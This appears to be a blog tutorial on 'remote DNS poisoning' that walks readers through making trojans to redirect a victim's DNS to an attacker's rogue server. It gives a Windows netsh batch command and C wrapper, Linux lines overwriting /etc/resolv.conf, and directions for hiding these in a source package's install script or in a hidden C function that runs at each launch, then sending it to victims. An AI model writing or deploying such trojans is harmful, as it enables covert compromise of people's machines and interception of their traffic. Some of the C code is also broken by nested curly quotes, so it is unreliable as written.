DNS Poisoning Tutorial – 2 | Internet DNS Poisoning

Following is our second tutorial on DNS Poisoning which is Internet DNS Poisoning, also known as Remote DNS Poisoning. This type of DNS poisoning can be done over a single or multiple victims and no matter where your victim is in world, the primary DNS entries of his/her system can be poisoned using this method. For this type of DNS poisoning attack you’ll have to setup a rouge DNS server somewhere with static IP address and please note that it should be in working condition. Methods of poisoning are different for Windows and Linux systems but happens with help of same entity that is Trojan file.
Here I ‘ll show you how to create DNS poisoning Trojans all you have to do is vector them.
For Windows:
For poisoning DNS of victim you must know name of his/her interface or name he/she has set for his/her internet connection. This condition is must for you to poison victim’s DNS if you don’t know their values then use default “Local Area Connection”. Now lets create a DNS spoofing Trojan Batch file. Type following lines in notepad and save it with any name and .bat extension.
netsh interface ip set dns “Local Area Connection” static 115.98.23.45
Above command will set DNS server of victim to 115.98.23.45 , you can change “Local Area Connection” by name of interface or connection if you know it, else always go with default. Now send that file to victim for poisoning his/her DNS entries. If you don’t want to send bat file because your victim might suspect it, then you can create an executable file by compiling following C program.
#include<stdio.h>
#include<stdlib.h>
int main()
{
char *str= “netsh interface ip set dns “Local Area Connection” static 115.98.23.45”;
system(str);
return 0 ;
}
Read Trojan Software Vectoring to know how to fool victim to execute your Trojan.
For Linux And UNIX:
Linux and UNIX systems save DNS entries in /etc/resolv.conf folder by changing entries in this file can help you poison DNS in Linux and UNIX systems. Now get IP address of working DNS server and IP address of rouge DNS server set by you. Suppose IP address of rouge DNS is 115.98.23.45 and real DNS server is 117.98.23.48. Then type following commands in a text file and save with .sh extension(for example change.sh ).
echo “nameserver 115.98.23.45” > /etc/resolv.conf
echo “nameserver 117.98.23.48” >> /etc/resolv.conf
Now all you have to do is vector this file to victim. For vectoring it get any source code installation package from internet of an interesting software your victim can’t deny to install in his/her system. Extract it and find a shell script in it, place change.sh in that folder, open target shell script in text editor and before it ends type following commands,
chmod +x change.sh
./change.sh
Pack it again and send to your victim for installation once he/she installs software from your source code he/she will be infected. Now sometimes its difficult to find a shell script in package but what is not difficult to find is a C source file. So if you get problem with above method, find a C source file with several functions in it and create following new function in it.
void change12345()
{
char *str;
str= “echo “nameserver 115.98.23.45” > /etc/resolv.conf”;
system(str);
str= “echo “nameserver 117.98.23.48” >> /etc/resolv.conf”;
system(str);
return;
}
And call this function in any other function before it returns something. Pack files again and send it to your victim, your file will execute every time when your victim will launch that program.
Now note that above exploits codes are really very basic, you can modify them according to your needs and if you think they are difficult to understand please get your hands on programming, even if you can understand basic programming you can write your own exploit codes. Please read books section to have a look on which books I recommend you to begin with programming.
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s